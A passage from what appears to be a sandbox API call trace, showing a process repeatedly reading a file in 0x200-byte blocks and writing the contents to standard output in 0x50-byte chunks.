nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.956] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.957] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.958] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.958] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.959] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.959] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.960] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.960] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.961] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.962] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.962] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.963] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.963] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.964] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.964] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: 